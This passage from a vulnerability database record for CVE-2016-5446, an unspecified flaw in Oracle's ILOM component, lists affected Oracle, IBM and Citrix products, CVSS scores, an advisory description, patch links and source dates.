scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: 
"healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic 
infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: 
"application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", 
version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91998", }, { db: "JVNDB", id: "JVNDB-2016-003874", }, { db: "CNNVD", id: "CNNVD-201607-810", }, { db: "NVD", id: "CVE-2016-5446", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003874", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, ], trust: 0.3, }, cve: "CVE-2016-5446", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, 
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "CVE-2016-5446", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 1.9, vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "VHN-94265", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:P/I:P/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "LOW", baseScore: 7.3, baseSeverity: "HIGH", confidentialityImpact: "LOW", exploitabilityScore: 3.9, id: "CVE-2016-5446", impactScore: 3.4, integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-5446", trust: 1, value: "HIGH", }, { author: "NVD", id: "CVE-2016-5446", trust: 0.8, value: "High", }, { author: "CNNVD", id: "CNNVD-201607-810", trust: 0.6, value: "HIGH", }, { author: "VULHUB", id: "VHN-94265", trust: 0.1, value: "HIGH", }, { author: "VULMON", id: "CVE-2016-5446", trust: 0.1, value: "HIGH", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-94265", }, { db: "VULMON", id: 
"CVE-2016-5446", }, { db: "JVNDB", id: "JVNDB-2016-003874", }, { db: "CNNVD", id: "CNNVD-201607-810", }, { db: "NVD", id: "CVE-2016-5446", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Infrastructure. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border 
Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the 'Multiple' protocol. 
The 'Infrastructure' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation", sources: [ { db: "NVD", id: "CVE-2016-5446", }, { db: "JVNDB", id: "JVNDB-2016-003874", }, { db: "BID", id: "91787", }, { db: "BID", id: "91998", }, { db: "VULHUB", id: "VHN-94265", }, { db: "VULMON", id: "CVE-2016-5446", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-5446", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "91998", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003874", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-810", trust: 0.7, }, { db: "VULHUB", id: "VHN-94265", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-5446", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-94265", }, { db: "VULMON", id: "CVE-2016-5446", }, { db: "BID", id: "91787", }, { db: "BID", id: "91998", }, { db: "JVNDB", id: "JVNDB-2016-003874", }, { db: "CNNVD", id: "CNNVD-201607-810", }, { db: "NVD", id: "CVE-2016-5446", }, ], }, id: "VAR-201607-0653", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-94265", }, ], trust: 0.01, }, last_update_date: "2024-11-23T19:56:37.120000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: 
"http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite Infrastructure Subcomponent security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63170", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-5446", }, { db: "JVNDB", id: "JVNDB-2016-003874", }, { db: "CNNVD", id: "CNNVD-201607-810", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-5446", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/91998", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5446", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5446", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, 
url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-94265", }, { db: "VULMON", id: "CVE-2016-5446", }, { db: "BID", id: "91787", }, { db: "BID", id: "91998", }, { db: "JVNDB", id: "JVNDB-2016-003874", }, { db: "CNNVD", id: "CNNVD-201607-810", }, { db: "NVD", id: "CVE-2016-5446", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-94265", }, { db: "VULMON", id: "CVE-2016-5446", }, { db: "BID", id: "91787", }, { db: "BID", id: "91998", }, { db: "JVNDB", id: "JVNDB-2016-003874", }, { db: "CNNVD", id: "CNNVD-201607-810", }, { db: "NVD", id: "CVE-2016-5446", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-94265", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-5446", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91998", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003874", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-810", }, { date: "2016-07-21T10:15:00.757000", db: "NVD", id: "CVE-2016-5446", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: "VHN-94265", }, { date: 
"2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-5446", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91998", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003874", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-810", }, { date: "2024-11-21T02:54:19.903000", db: "NVD", id: "CVE-2016-5446", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91998", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In Infrastructure Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003874", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91998", }, ], trust: 0.6, }, }
var-201607-0661
Vulnerability from variot
